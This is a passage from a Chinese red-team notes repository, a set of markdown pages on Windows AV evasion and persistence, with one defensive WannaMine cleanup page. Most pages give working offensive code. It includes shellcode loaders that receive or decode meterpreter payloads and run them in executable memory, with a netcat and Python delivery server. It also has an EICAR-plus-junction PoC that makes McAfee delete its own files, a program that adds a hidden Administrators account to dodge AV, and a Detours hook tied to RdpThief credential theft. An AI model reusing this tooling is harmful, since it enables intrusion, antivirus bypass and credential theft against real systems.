36 | 防止在流量检测的时候被杀掉，我们使用windows/meterpreter/reverse\_tcp\_rc4这个payload。
37 | 
38 | ![](../.gitbook/assets/image%20%28147%29.png)
39 | 
40 | ![](../.gitbook/assets/image%20%28146%29.png)
41 | 
42 | 略略略。
43 | 
44 | ## 代码
45 | 
46 | ```text
47 | // hex.cpp : Defines the entry point for the console application.
48 | //
49 | 
50 | #include "stdafx.h"
51 | 
52 | 
53 | 
54 | 
55 | int main(int argc, char* argv[]) {
56 | 
57 |     char *str = argv[1];
58 |     
59 | 
60 |     unsigned int char_in_hex;
61 |     
62 |     unsigned int iterations = strlen(str);
63 |     unsigned int memory_allocation = strlen(str) / 2;
64 | 
65 |     char* temp = (char*)VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
66 |     int p = 0;
67 | 
68 |     for (int i = strlen(str) - 1; i >= 0; i--)
69 |     {
70 |         temp[p++] = str[i];
71 |     }
72 | 
73 |     char* shellcode = (char*)temp;
74 | 
75 |     for (i = 0; i < iterations - 1; i++) {
76 |         sscanf(shellcode + 2 * i, "%2X", &char_in_hex);
77 |         shellcode[i] = (char)char_in_hex;
78 |     }
79 | 
80 | 
81 |     void* exec = VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
82 |     memcpy(exec, shellcode, memory_allocation);
83 |     VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, NULL);
84 | 
85 |     (*(void (*WINAPI)()) exec)();
86 | 
87 |     return 0;
88 | }
89 | 
90 | ```
91 | 
92 | 


--------------------------------------------------------------------------------
/defense-evasion/simple-separate-bypassav.md:
--------------------------------------------------------------------------------
  1 | # 简单的分离免杀
  2 | 
  3 | ## 简介
  4 | 
  5 | 通常杀毒软件会匹配静态特征来进行恶意软件的识别，虽然现在有很多行为查杀的引擎，但个人认为杀毒软件仍旧已特征码为主，行为免杀很大程度上是监控windows api，而这些恶意软件使用的api往往都是和合法软件是一致的，这也成为了行为查杀技术的桎梏，很多恶意软件只要换个不同的编译环境，就能不被杀毒软件注意到从而绕过杀毒软件。
  6 | 
  7 | 本文鉴于目前杀毒软件仍旧以特征库为主，将病毒代码体和执行体分离，从而规避特征免杀。
  8 | 
  9 | ## 流程
 10 | 
 11 | 1. 在受害者电脑上打开个侦听端口，分配可执行内存
 12 | 2. 等待传入 payload
 13 | 3. 连接到受害者侦听端口，将 shellcode 作为二进制数据发送
 14 | 4. 受害者将 shellcode 拷入可执行内存
 15 | 5. 执行 shellcode，由 metasploit 接管 session
 16 | 
 17 | ## 代码实现
 18 | 
 19 | 给出代码是监听端口等待连接的，也可以做简单修改做成反向连接的。
 20 | 
 21 | ```text
 22 | #include <WinSock2.h>
 23 | #include <WS2tcpip.h>
 24 | #include <iostream>
 25 | #include <Windows.h>
 26 | #pragma comment(lib, "ws2_32.lib")
 27 | int main(void)
 28 | {
 29 | LPWSADATA wsaData = new WSAData();
 30 | SOCKET listenSocket = INVALID_SOCKET;
 31 | SOCKET ClientSocket = INVALID_SOCKET;
 32 | CHAR bufferReceivedBytes[4096] = { 0 };
 33 | INT RecvBytes = 0;
 34 | PCSTR port = "477";
 35 | ADDRINFOA* SocketHint = new ADDRINFOA();
 36 | ADDRINFOA* AddrInfo = new ADDRINFOA();
 37 | SocketHint->ai_family = AF_INET;
 38 | SocketHint->ai_socktype = SOCK_STREAM;
 39 | SocketHint->ai_protocol = IPPROTO_TCP;
 40 | SocketHint->ai_flags = AI_PASSIVE;
 41 | WSAStartup(MAKEWORD(2, 2), wsaData);
 42 | GetAddrInfoA(NULL, port, SocketHint, &AddrInfo);
 43 | listenSocket = socket(AddrInfo->ai_family, AddrInfo->ai_socktype,
 44 | AddrInfo->ai_protocol);
 45 | bind(listenSocket, AddrInfo->ai_addr, AddrInfo->ai_addrlen);
 46 | listen(listenSocket, SOMAXCONN);
 47 | ClientSocket = accept(listenSocket, NULL, NULL);
 48 | RecvBytes = recv(ClientSocket, bufferReceivedBytes, sizeof(bufferReceivedBytes),
 49 | NULL);
 50 | LPVOID shellcode = VirtualAlloc(NULL, RecvBytes, MEM_COMMIT | MEM_RESERVE,
 51 | PAGE_EXECUTE_READWRITE);
 52 | memcpy(shellcode, bufferReceivedBytes, sizeof(bufferReceivedBytes));
 53 | ((void(*)()) shellcode)();
 54 | return 0;
 55 | }
 56 | ```
 57 | 
 58 | ## 实现效果
 59 | 
 60 | ![](../.gitbook/assets/image%20%2847%29.png)
 61 | 
 62 | 端口已经开始侦听 我们使用 msf 生成 shellcode 并通过 nc 交付给受害者
 63 | 
 64 | ![](../.gitbook/assets/image%20%2876%29.png)
 65 | 
 66 | 生成一段 c 格式的 shellcode
 67 | 
 68 | ![](../.gitbook/assets/image%20%2858%29.png)
 69 | 
 70 | 处理一下变成一句字符串的形式
 71 | 
 72 | ![](../.gitbook/assets/image%20%284%29.png)
 73 | 
 74 | ```text
 75 | echo -e “shellcode-line” |nc  ip port
 76 | ```
 77 | 
 78 | 可以使用简单的python服务器传递shellcode
 79 | 
 80 | ```text
 81 | import socket
 82 | import threading
 83 | import time  
 84 | 
 85 | def main():
 86 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 87 |     s.bind(('127.0.0.1', 36444)) # 公网地址
 88 |     s.listen(20)
 89 |     timeout = 10
 90 |     socket.setdefaulttimeout(timeout)
 91 |     while True:
 92 |         sock, addr = s.accept()
 93 |         t = threading.Thread(target=tcplink, args=(sock, addr))
 94 |         t.start()
 95 | 
 96 | 
 97 | def tcplink(sock, addr):
 98 |     print('Start download shellcode %s:%s...' % addr)
 99 |     shellcode = b'1111111' #your shellcode
100 |     print(len(shellcode))
101 |     while True:
102 |         data = sock.recv(1024)
103 |         time.sleep(3)
104 |         sock.send(shellcode)
105 |         sock.close()
106 |     print('Finish %s:%s ' % addr)
107 | 
108 | 
109 | if __name__ == '__main__':
110 |     main()
111 | ```
112 | 
113 | ![](../.gitbook/assets/image%20%2865%29.png)
114 | 
115 | ![](../.gitbook/assets/image%20%2828%29.png)
116 | 
117 | 
118 | 
119 | 


--------------------------------------------------------------------------------
/defense-evasion/using-antivirus-to-delete-files.md:
--------------------------------------------------------------------------------
 1 | # 利用杀毒软件删除任意文件
 2 | 
 3 | ## 简介
 4 | 
 5 | 通常，下载一个未知文件保存到硬盘后，杀毒软件通常会在短时间进行实时扫描，如果确定为可疑或威胁，该文件会被自动隔离，并询问用户是否处理。
 6 | 
 7 | 考虑到杀毒软件几乎都已高权限运行，这样就为我们对杀毒软件利用产生了条件，我们可以往一个合法文件里写入恶意代码特征，然后利用杀毒软件帮我去删除这个文件，当然前提是这个文件当前没有使用。
 8 | 
 9 | ## 测试字符串
10 | 
11 | ```text
12 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
13 | ```
14 | 
15 | > **来自维基百科:**
16 | >
17 | > **EICAR标准反病毒测试文件**，又称**EICAR测试文件**, 是由[欧洲反计算机病毒协会](https://zh.wikipedia.org/wiki/%E6%AC%A7%E6%B4%B2%E5%8F%8D%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%97%85%E6%AF%92%E5%8D%8F%E4%BC%9A)（EICAR）与[计算机病毒研究组织](https://zh.wikipedia.org/w/index.php?title=%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%97%85%E6%AF%92%E7%A0%94%E7%A9%B6%E7%BB%84%E7%BB%87&action=edit&redlink=1)（CARO）研制的文件, 用以测试[杀毒软件](https://zh.wikipedia.org/wiki/%E6%9D%80%E6%AF%92%E8%BD%AF%E4%BB%B6)的响应程度。不同于使用可能造成实际破环的实体恶意软件，该文件允许人们在没有计算机病毒的情况下测试杀毒软件。
18 | >
19 | > 杀毒软件的开发者将EICAR字符串视为测试病毒，与其他鉴别标识相似。合格的病毒扫描器在发现文件时，会精确地采用相同方式处置，如同发现一个严重的病毒时那样。注意并非所有病毒扫描器是合格的，有些病毒扫描器会在精确识别后保留文件。
20 | >
21 | > EICAR测试字符的用法要比直接测试灵活：包含EICAR测试字符的文件会被[压缩](https://zh.wikipedia.org/wiki/%E6%95%B0%E6%8D%AE%E5%8E%8B%E7%BC%A9)或者[存档](https://zh.wikipedia.org/wiki/%E5%AD%98%E6%A1%A3)，并且杀毒软件会尝试删除压缩文件中的测试字符。
22 | 
23 | 简单的说为了测试杀毒软件的性能,所有厂商都会把这个测试字符串当作病毒处理。
24 | 
25 | ![](../.gitbook/assets/image%20%2880%29.png)
26 | 
27 | 预想一个场景，在杀毒软件运行时考虑到内存占用可能并不会加载所有自身dll，那我们往这个未加载的dll里写入这个测试字符串，这样杀毒软件就会自己干掉自己，等到需要用到这个功能dll的时候，这个功能就会失效。
28 | 
29 | ## 利用流程
30 | 
31 | 1. 往文件写入测试字符串
32 | 
33 | ## 利用代码
34 | 
35 | ```text
36 | echo X5O!P%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*  > <FILENAME>
37 | ```
38 | 
39 | ## 扩展利用
40 | 
41 | windows提供了一个目录链接功能，只能将两个目录链接在一起。它不能链接文件，并且目录必须在文件系统本地。目录连接可以由任何用户执行，并且不需要管理员特权，因此非常适合在Windows操作系统下利用防病毒软件进行利用。
42 | 
43 | 此poc来自rack911labs:
44 | 
45 | ```text
46 | :loop
47 | rd /s /q C:\Users\Username\Desktop\exploit
48 | mkdir C:\Users\Username\Desktop\exploit
49 | echo X5O!P%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:\Users\Username\Desktop\exploit\EpSecApiLib.dll
50 | rd /s /q C:\Users\Username\Desktop\exploit
51 | mklink /J C:\Users\Username\Desktop\exploit “C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform”
52 | goto loop
53 | ```
54 | 
55 | ## LINKS
56 | 
57 | {% embed url="https://zh.wikipedia.org/wiki/EICAR%E6%A0%87%E5%87%86%E5%8F%8D%E7%97%85%E6%AF%92%E6%B5%8B%E8%AF%95%E6%96%87%E4%BB%B6" %}
58 | 
59 | {% embed url="https://www.rack911labs.com/research/exploiting-almost-every-antivirus-software/" %}
60 | 
61 | 


--------------------------------------------------------------------------------
/defense-evasion/wow64-and-cross-bit-process-injection.md:
--------------------------------------------------------------------------------
1 | # x64转换层&跨位数进程注入
2 | 
3 | 欸 我不写你气不气
4 | 
5 | 


--------------------------------------------------------------------------------
/emergency-response/fuck-wannamine4.0.md:
--------------------------------------------------------------------------------
  1 | # WannaMine4.0专杀的一些技巧
  2 | 
  3 | ## 简介
  4 | 
  5 | 今年我们这破地方的卫生系统又双叒叕爆发内网病毒了，这篇文章是记录病毒清理的一个思路，主要是对踩的一些坑的记录，本文仅对木马最后的执行体做查杀，这个病毒是基于WannaCry勒索的变种，仅将最后释放的执行体做了更改。
  6 | 
  7 | 首先我们需要看一下这个病毒的分析，由于这种病毒已经有师傅做过详尽的分析，这里直接照搬[WPeace](https://bbs.pediy.com/user-home-906228.htm)师傅的流程图。
  8 | 
  9 | ![&#x6D41;&#x7A0B;&#x56FE;](../.gitbook/assets/image%20%28211%29.png)
 10 | 
 11 | ## 查杀思路
 12 | 
 13 | 病毒首先注册污点注册表释放一个随机固定单词组合的一个服务dll，然后注册一个系统服务用svchost.exe带起这个恶意dll，这个注册表键值对里会写入服务名和dll路径和服务的描述信息，这里我们可以直接读取这个键值来获取服务名。\(有一说一，有些专杀通过枚举单词组合来确定服务是真的蠢。\)
 14 | 
 15 | > 字符串1列表：Windows、Microsoft、Network、Remote、Function、Secure、Application
 16 | >
 17 | > 字符串2列表：Update、Time、NetBIOS、RPC、Protocol、SSDP、UPnP
 18 | >
 19 | > 字符串3列表：Service、Host、Client、Event、Manager、Helper、System
 20 | 
 21 | ```text
 22 | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location Awareness
 23 | ```
 24 | 
 25 | ![](../.gitbook/assets/image%20%28214%29.png)
 26 | 
 27 | ![](../.gitbook/assets/image%20%28210%29.png)
 28 | 
 29 | ![](../.gitbook/assets/image%20%28213%29.png)
 30 | 
 31 | ```text
 32 | 	BOOL bRet = EnbalePrivileges(GetCurrentProcess(), SE_DEBUG_NAME);
 33 | 	if(bRet){
 34 | 		printf("[+]Enbale DebugPrivileges successful\n");
 35 | 	}else	{
 36 | 		printf("[-]Can not Enbale DebugPrivileges successful\n");
 37 | 	}
 38 | 	bRet = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location Awareness", 0, KEY_ALL_ACCESS, &hKey);
 39 | 	if(!bRet){
 40 | 		printf("[+]Open Key successful\n");
 41 | 	}else	{
 42 | 		printf("[-]Can not Open Key successful\n");
 43 | 	}
 44 | 	LONG lResult = RegQueryValueExA(hKey,"LastBackup" , NULL, &dwType,
 45 |            NULL, &dwSize);
 46 |     if (lResult == ERROR_SUCCESS)
 47 |        {        
 48 |            lResult = RegQueryValueExA(hKey, "LastBackup", NULL, &dwType,
 49 |                 (LPBYTE)buffer, &dwSize);
 50 |             
 51 |     }
 52 | 	if(!lResult){
 53 | 		printf("[+]Query Key Value successful\n");
 54 | 	}else	{
 55 | 		printf("[-]Can not Query Key Value successful\n");
 56 | 	}
 57 | ```
 58 | 
 59 | 根据多次调试，跑沙箱，发现这个病毒的流程并不固定，它可能会带起各种各样的进程，如果我们不结束这些进程就无法用常规的方法删除他们，当然也可以干掉启动项，然后重启删除他们，但这样会对业务产生影响，这里使用了结束进程树的方式，结束进程树可以干掉所有由父进程带起来的子进程以及子进程的子进程。
 60 | 
 61 | ![](../.gitbook/assets/image%20%28215%29.png)
 62 | 
 63 | ![](../.gitbook/assets/image%20%28212%29.png)
 64 | 
 65 | 只要我们结束了最上级进程，那它下属的所有进程都会被结束\(结束进程树\)，这样我们就有两种思路：
 66 | 
 67 | 1. 定位其中一个进程查找可结束的最上级进程，之前[fuck-eventlog](../defense-evasion/fuck-eventlog.md)的时候用过类似方法\(这里是服务，所有windows服务都是由services进程带起的，所以查找到父进程是services.exe就代表这个进程是可结束的最上级进程\)。
 68 | 2. 通过服务名定位服务进程实例\(由于这个病毒是用服务带起来的所以，本文采用这种方法\)。
 69 | 
 70 | 方法2使用QueryServiceStatusEx函数来定位服务的实例进程，需要指定查询等级为SC\_STATUS\_PROCESS\_INFO，这样这个函数会返回一个名为SERVICE\_STATUS\_PROCESS的结构体，这个结构体的dwProcessId成员就是改服务实例化的进程id。
 71 | 
 72 | ```text
 73 | typedef struct _SERVICE_STATUS_PROCESS {
 74 |   DWORD dwServiceType;
 75 |   DWORD dwCurrentState;
 76 |   DWORD dwControlsAccepted;
 77 |   DWORD dwWin32ExitCode;
 78 |   DWORD dwServiceSpecificExitCode;
 79 |   DWORD dwCheckPoint;
 80 |   DWORD dwWaitHint;
 81 |   DWORD dwProcessId;
 82 |   DWORD dwServiceFlags;
 83 | } SERVICE_STATUS_PROCESS, *LPSERVICE_STATUS_PROCESS;
 84 | ```
 85 | 
 86 | 现在我们就通过windows的services api定位，代码如下:
 87 | 
 88 | ```text
 89 | void KillProcessTree(DWORD dwProcessId) {
 90 | 
 91 |     PROCESSENTRY32 pe = { 0 };
 92 |     pe.dwSize = sizeof(PROCESSENTRY32);
 93 |     HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 94 |     if (Process32First(hSnap, &pe)) {
 95 |         do {
 96 |             if (pe.th32ParentProcessID == dwProcessId)
 97 |                 KillProcessTree(pe.th32ProcessID);
 98 |         } while (Process32Next(hSnap, &pe));
 99 |     }
100 | 
101 | 
102 |     HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
103 |     if (hProc) {
104 |         TerminateProcess(hProc, 1);
105 |         CloseHandle(hProc);
106 |     }
107 | }
108 | 	
109 | 	bRet = QueryServiceStatusEx(
110 |         hService,           
111 |         SC_STATUS_PROCESS_INFO,   
112 |         (LPBYTE)&ssStatus,           
113 |         sizeof(SERVICE_STATUS_PROCESS),
114 |         &outSize);
115 | 
116 | 	if(bRet){
117 | 		printf("[+]Query ServiceStatus successful\n");
118 | 	}else	{
119 | 		printf("[-]Can not Query ServiceStatus successful\n");
120 | 	}
121 | 	if(ssStatus.dwProcessId!=0){
122 | 		KillProcessTree(ssStatus.dwProcessId);
123 | 	}
124 | 
125 | 	bRet = DeleteService(hService);
126 | ```
127 | 
128 | 最后就是简简单单的删文件删注册表删服务了。
129 | 
130 | ```text
131 | 
132 | 	bRet = DeleteService(hService);
133 | 	if(bRet){
134 | 		printf("[+]Delete Service successful\n");
135 | 	}else	{
136 | 		printf("[-]Can not Delete Service successful\n");
137 | 	}
138 | 
139 | 	printf("[*]Deleting malware file ......\n");
140 | 	char ServiceDllPath[MAX_PATH]={0};
141 | 	memcpy(ServiceDllPath,buffer,strlen(buffer));
142 | 	sprintf_s(buffer, "del %s /Q /F\n", ServiceDllPath);
143 |     system(buffer);
144 | 	for (size_t i = 0; i < sizeof(strings) / MAX_PATH; i++)
145 |     {
146 |           sprintf_s(buffer, "del %s /Q /F\n", strings[i]);
147 |           system(buffer);
148 |     }
149 | 	printf("[+]Delete malware file successful!\n");
150 | 	RegCloseKey(hKey);
151 | 	CloseServiceHandle(hSCM);
152 | 	CloseServiceHandle(hService);
153 | ```
154 | 
155 | ## LINKS
156 | 
157 | {% embed url="https://www.freebuf.com/articles/terminal/198891.html" %}
158 | 
159 | {% embed url="https://bbs.pediy.com/thread-263127.htm" %}
160 | 
161 | 
162 | 
163 | 


--------------------------------------------------------------------------------
/persistence/api-add-user.md:
--------------------------------------------------------------------------------
  1 | # 通过API添加Windows用户
  2 | 
  3 | ## 简介
  4 | 
  5 | 在渗透测试过程中，如果需要白利用远程桌面等服务，往往我们还需要一个知道密码的windows账户，而这个账户通常直接由net1.exe直接添加\(当然也可以直接pass the hash登录rdp，略略略\)，而调用这个可执行文件往往会被第三方杀软直接拦截（略略略，defender是微软自己的，不拦合法功能），这样我们就需要想另外的办法添加用户。
  6 | 
  7 | ## 分析过程
  8 | 
  9 | 1. 查文档&google\(狗头\)
 10 | 
 11 | ![](../.gitbook/assets/image%20%28138%29.png)
 12 | 
 13 | 1. 调用NetUserAdd添加本地用户
 14 | 2. 调用NetLocalGroupAddMembers将用户添加到组
 15 | 
 16 | ## 代码
 17 | 
 18 | 微软文档解释了这个如何通过这个函数来添加操作系统账户，第一个参数servername指定了需要添加用户的主机名，传入NULL则为本地添加，第二个参数决定了第三个参数传入的结构体，通过这个函数我们可以在windows操作系统上添加账户。
 19 | 
 20 | ```text
 21 | NET_API_STATUS NET_API_FUNCTION NetUserAdd(
 22 |   LPCWSTR servername,
 23 |   DWORD   level,
 24 |   LPBYTE  buf,
 25 |   LPDWORD parm_err
 26 | );
 27 | ```
 28 | 
 29 | <table>
 30 |   <thead>
 31 |     <tr>
 32 |       <th style="text-align:left">Value</th>
 33 |       <th style="text-align:left">Meaning</th>
 34 |     </tr>
 35 |   </thead>
 36 |   <tbody>
 37 |     <tr>
 38 |       <td style="text-align:left"><b>1</b>
 39 |       </td>
 40 |       <td style="text-align:left">
 41 |         <p>Specifies information about the user account. The buf parameter points
 42 |           to a <a href="https://docs.microsoft.com/en-us/windows/desktop/api/lmaccess/ns-lmaccess-user_info_1">USER_INFO_1</a> structure.</p>
 43 |         <p>When you specify this level, the call initializes certain attributes to
 44 |           their default values. For more information, see the following Remarks section.</p>
 45 |       </td>
 46 |     </tr>
 47 |     <tr>
 48 |       <td style="text-align:left"><b>2</b>
 49 |       </td>
 50 |       <td style="text-align:left">Specifies level one information and additional attributes about the user
 51 |         account. The buf parameter points to a <a href="https://docs.microsoft.com/en-us/windows/desktop/api/lmaccess/ns-lmaccess-user_info_2">USER_INFO_2</a> structure.</td>
 52 |     </tr>
 53 |     <tr>
 54 |       <td style="text-align:left"><b>3</b>
 55 |       </td>
 56 |       <td style="text-align:left">Specifies level two information and additional attributes about the user
 57 |         account. This level is valid only on servers. The buf parameter points
 58 |         to a <a href="https://docs.microsoft.com/en-us/windows/desktop/api/lmaccess/ns-lmaccess-user_info_3">USER_INFO_3</a> structure.
 59 |         Note that it is recommended that you use <a href="https://docs.microsoft.com/en-us/windows/desktop/api/lmaccess/ns-lmaccess-user_info_4">USER_INFO_4</a> instead.</td>
 60 |     </tr>
 61 |     <tr>
 62 |       <td style="text-align:left"><b>4</b>
 63 |       </td>
 64 |       <td style="text-align:left">
 65 |         <p>Specifies level two information and additional attributes about the user
 66 |           account. This level is valid only on servers. The buf parameter points
 67 |           to a <a href="https://docs.microsoft.com/en-us/windows/desktop/api/lmaccess/ns-lmaccess-user_info_4">USER_INFO_4</a> structure.</p>
 68 |         <p><b>Windows 2000:  </b>This level is not supported.</p>
 69 |       </td>
 70 |     </tr>
 71 |   </tbody>
 72 | </table>
 73 | 
 74 | 同理将该账户加入administrators组也是使用类似的函数，这里就不贴参数了。
 75 | 
 76 | ```text
 77 | NET_API_STATUS NET_API_FUNCTION NetLocalGroupAddMembers(
 78 |   LPCWSTR servername,
 79 |   LPCWSTR groupname,
 80 |   DWORD   level,
 81 |   LPBYTE  buf,
 82 |   DWORD   totalentries
 83 | );
 84 | ```
 85 | 
 86 | ### 完整代码
 87 | 
 88 | ```text
 89 | #ifndef UNICODE
 90 | #define UNICODE
 91 | #endif
 92 | #pragma comment(lib, "netapi32.lib")
 93 | 
 94 | #include <stdio.h>
 95 | #include <windows.h> 
 96 | #include <lm.h>
 97 | 
 98 | int wmain(int argc, wchar_t* argv[])
 99 | {
100 |     USER_INFO_1 ui;
101 |     DWORD dwLevel = 1;
102 |     DWORD dwError = 0;
103 |     NET_API_STATUS nStatus;
104 | 
105 |     if (argc != 3)
106 |     {
107 |         
108 |         fwprintf(stderr, L"Usage:./this.exe <username> <password>\n", argv[0]);
109 |         exit(1);
110 |     }
111 | 
112 |     ui.usri1_name = argv[1];
113 |     ui.usri1_password = argv[2];
114 |     ui.usri1_priv = USER_PRIV_USER;
115 |     ui.usri1_home_dir = NULL;
116 |     ui.usri1_comment = NULL;
117 |     ui.usri1_flags = UF_SCRIPT;
118 |     ui.usri1_script_path = NULL;
119 | 
120 |     nStatus = NetUserAdd(NULL,
121 |         dwLevel,
122 |         (LPBYTE)&ui,
123 |         &dwError);
124 | 
125 |     if (nStatus == NERR_Success)
126 |         fwprintf(stderr, L"User %s has been successfully added\n",argv[1]);
127 | 
128 |     else
129 |         fprintf(stderr, "A system error has occurred: %d\n", nStatus);
130 | 
131 |     LOCALGROUP_MEMBERS_INFO_3 account;
132 |     account.lgrmi3_domainandname = argv[1];
133 | 
134 |     NET_API_STATUS Status = NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
135 | 
136 |     if (Status == NERR_Success || Status == ERROR_MEMBER_IN_ALIAS){
137 |         printf("Administrators added Successfully!");
138 |     }
139 |     else {
140 |         printf("Administrators added Failed!");
141 |     }
142 |     return 0;
143 | }
144 | ```
145 | 
146 | ## LINKS
147 | 
148 | {% embed url="https://docs.microsoft.com/en-us/windows/win32/api/lmaccess/nf-lmaccess-netlocalgroupaddmembers" %}
149 | 
150 | {% embed url="https://docs.microsoft.com/en-us/windows/win32/api/lmaccess/nf-lmaccess-netuseradd" %}
151 | 
152 | 
153 | 
154 | 


--------------------------------------------------------------------------------
/persistence/detous-inline-hook.md:
--------------------------------------------------------------------------------
 1 | # Detours InLine Hook
 2 | 
 3 | ## Inline hook 简介
 4 | 
 5 | 通常hook是指一种改变代码执行流程将其拦截并重定向到另一片代码块的技术，其实现方式有很多种，针对ring3\(用户层\)，常见的有虚表vitualtables hook，inline hook，iat hook，callbackhook等，本文介绍的inline hook使用修改函数具体代码实现的执行链劫持，在windows 10操作系统中由于ASLR\(地址随机化\)的缘故，手工实现InLine比较麻烦，这里使用微软的一个轻量级的开源库。
 6 | 
 7 | 详见该开源库的wiki。
 8 | 
 9 | ![](../.gitbook/assets/image%20%28102%29.png)
10 | 
11 | ![](../.gitbook/assets/image%20%28100%29.png)
12 | 
13 | ## 示例代码
14 | 
15 | ```text
16 | #include<Windows.h>
17 | #include<stdio.h>
18 | #include "include/detours.h"
19 | #if _X64
20 | #pragma comment(lib,"lib.X64/detours.lib")
21 | #else
22 | #pragma comment(lib,"lib.X86/detours.lib")
23 | #endif
24 | 
25 | static int (WINAPI* OldMesssageBoxA)
26 | (
27 |     HWND hWnd,
28 |     LPCSTR lpText,
29 |     LPCSTR lpCaption,
30 |     UINT uType
31 |     ) = MessageBoxA;
32 | 
33 | int WINAPI MyFunction0(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
34 | {
35 |     return OldMesssageBoxA(NULL, "Hooking your MessageBoxA!", "Warming", MB_OKCANCEL);
36 | }
37 | 
38 | int main() {
39 |     DetourTransactionBegin();
40 |     DetourUpdateThread(GetCurrentThread());
41 |     DetourAttach(&(PVOID&)OldMesssageBoxA, MyFunction0);
42 |     //DetourDetach(&(PVOID&)OldMesssageBoxA, MyFunction0);
43 |     DetourTransactionCommit();
44 | 
45 |     MessageBoxA(0, 0, 0, 0);
46 | 
47 | 
48 | 	return 0;
49 | }
50 | ```
51 | 
52 | ![](../.gitbook/assets/image%20%28101%29.png)
53 | 
54 | ## RdpThief应用
55 | 
56 | 前段时间\(很久很久以前\)，有一篇专门讲通过detours窃取rdp凭证的文章，这里作为案例复现一下。
57 | 
58 | 起一个rdp客户端创建连接。
59 | 
60 | ![](../.gitbook/assets/image%20%28104%29.png)
61 | 
62 | 搜索用户名。
63 | 
64 | ![](../.gitbook/assets/image%20%28103%29.png)
65 | 
66 | ![](../.gitbook/assets/image%20%28105%29.png)
67 | 
68 | 密码也是同样，这里密码通过不能通过字符串搜索直接出结果，但根据查看函数调用可知具体密码处于CryptProtectMemory函数第一个参数所指向的内存区域偏移+4的位置。
69 | 
70 | ![](../.gitbook/assets/image%20%28107%29.png)
71 | 
72 | 具体ip地址也是一样。
73 | 
74 | ![](../.gitbook/assets/image%20%28106%29.png)
75 | 
76 | github:[https://github.com/0x09AL/RdpThief.git](https://github.com/0x09AL/RdpThief.git)
77 | 
78 | ## LINKS
79 | 
80 | {% embed url="https://www.cnblogs.com/M-Anonymous/p/9766343.html" %}
81 | 
82 | {% embed url="https://github.com/microsoft/Detours/wiki/OverviewInterception" %}
83 | 
84 | {% embed url="https://blog.csdn.net/systemino/article/details/103083541" %}
85 | 
86 | 
87 | 
88 | 


--------------------------------------------------------------------------------
/persistence/find-file.md:
--------------------------------------------------------------------------------
 1 | # 寻找有价值的文件
 2 | 
 3 | ## 简介
 4 | 
 5 | 我也不知道这玩意大概有什么价值，只是说一般成熟的集成攻击框架内基本都有这样的功能，能从操作系统中搜索带有特定关键字或后缀的文件，这些文件能很大程度帮助我们更好的完成红队任务，虽然此类功能一般也不会被杀软拦掉\(略略略\)。\(可别拿去写勒索病毒！\)。
 6 | 
 7 | ## 流程
 8 | 
 9 | 1. 通过路径创建一个搜索句柄
10 | 2. 遍历这个搜索句柄
11 | 
12 | ## 代码
13 | 
14 | 这玩意就比较简单了，和之前遍历进程的功能非常相似，同样也是用到了操作系统提供的api。
15 | 
16 | ```text
17 | HANDLE FindFirstFileA(
18 |   LPCSTR             lpFileName,
19 |   LPWIN32_FIND_DATAA lpFindFileData
20 | );
21 | 
22 | BOOL FindNextFileA(
23 |   HANDLE             hFindFile,
24 |   LPWIN32_FIND_DATAA lpFindFileData
25 | );
26 | ```
27 | 
28 | 需要注意的是搜索句柄需要用FindClose函数来关闭。
29 | 
30 | 如果需要更细粒度的文件遍历可以使用FindFirstFileEx去创建搜索句柄。
31 | 
32 | ```text
33 | #include <Windows.h>
34 | #include <stdio.h>
35 | #include <string.h>
36 | 
37 | void SearchFile(char* pszDirectory,char* pszSuffix)
38 | {
39 | 	DWORD dwBufferSize = 2048;
40 | 	char FileName[MAX_PATH] = {0};
41 | 	char TempPath[MAX_PATH] = {0};
42 | 	WIN32_FIND_DATA fdFileData = { 0 };
43 | 
44 | 
45 | 	wsprintf(FileName, "%s\\*.*", pszDirectory);
46 | 
47 | 	HANDLE hFile = FindFirstFileA(FileName, &fdFileData);
48 | 
49 | 	if (INVALID_HANDLE_VALUE != hFile)
50 | 	{
51 | 		do
52 | 		{
53 | 			if ('.' == fdFileData.cFileName[0])
54 | 			{
55 | 				continue;
56 | 			}
57 | 			wsprintf(TempPath, "%s\\%s", pszDirectory, fdFileData.cFileName);
58 | 			if (fdFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
59 | 			{
60 | 				SearchFile(TempPath, pszSuffix);
61 | 			}
62 | 			else
63 | 			{
64 | 				if (strstr(TempPath, pszSuffix))
65 | 				{
66 | 					printf("%s\n", TempPath);
67 | 				}
68 | 			}
69 | 
70 | 		} while (FindNextFileA(hFile, &fdFileData));
71 | 	}
72 | 
73 | 	FindClose(hFile);
74 | }
75 | 
76 | int main(int argc, char* argv[])
77 | {
78 | 	SearchFile((char*)"C:\\Users\\Black Sheep\\Desktop",(char*)".exe");
79 | 
80 | 	return 0;
81 | }
82 | ```
83 | 
84 | ![](../.gitbook/assets/image%20%28135%29.png)
85 | 
86 | ## LINKS
87 | 
88 | {% embed url="https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-findnextfilea" %}
89 | 
90 | 
91 | 
92 | 


--------------------------------------------------------------------------------
/persistence/get-computer-installed-software.md:
--------------------------------------------------------------------------------
  1 | # 获取机器安装的软件
  2 | 
  3 | ## 简介
  4 | 
